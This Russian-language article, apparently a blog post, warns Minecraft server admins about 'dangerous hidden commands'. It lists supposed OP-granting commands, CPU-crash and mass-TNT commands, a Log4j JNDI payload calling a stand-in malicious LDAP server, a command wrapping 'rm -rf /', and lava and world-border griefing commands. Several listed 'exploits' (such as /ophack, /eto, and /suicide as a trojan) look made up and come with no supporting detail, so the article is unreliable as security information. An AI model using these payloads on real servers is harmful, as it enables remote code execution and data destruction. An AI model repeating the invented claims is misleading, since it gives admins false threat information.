В мире Minecraft существует множество скрытых команд, которые могут представлять серьезную угрозу для серверов. Эти команды, известные в узких кругах, способны вызывать краши, давать нелегитимные привилегии или даже полностью разрушать игровые миры. Мы решили раскрыть эту тему, чтобы администраторы серверов могли лучше защитить свои проекты.

Одной из самых опасных категорий являются команды, дающие администраторские права. Например:

Получение админ-прав
/forceop – обход системы прав
/ophack – скрытый метод получения OP
/eb give me op – эксплойт через плагины
/eto – альтернативный вариант взлома

Команды для краша сервера
//calculate for(i=0;i<256;i++){...} – рекурсивная перегрузка CPU
/execute as @e run fill ~ ~ ~ ~100 ~100 ~100 tnt – массовый спавн TNT

Эксплойты уязвимостей
/tellraw @a {"text":"${jndi:ldap://вредоносный-сервер}"} – Log4j RCE
/asw process start "rm -rf /" – удаление файлов

Фишинг и кража данных
/suicide (с особыми кликами) – троян
/et-sp – кража конфигов сервера

Разрушение мира
/fill ~ ~ ~ ~100 ~100 ~100 lava – залив лавой
/worldborder set 1 – схлопывание границы

Подозрительные команды в плагинах
/holographicscoreboard – скрытые эксплойты
/wg-ef – уязвимости в WorldGuard

Защита сервера начинается с понимания этих угроз. Регулярное обновление плагинов, грамотная настройка прав доступа и использование специализированных защитных решений — вот три кита безопасности Minecraft-сервера.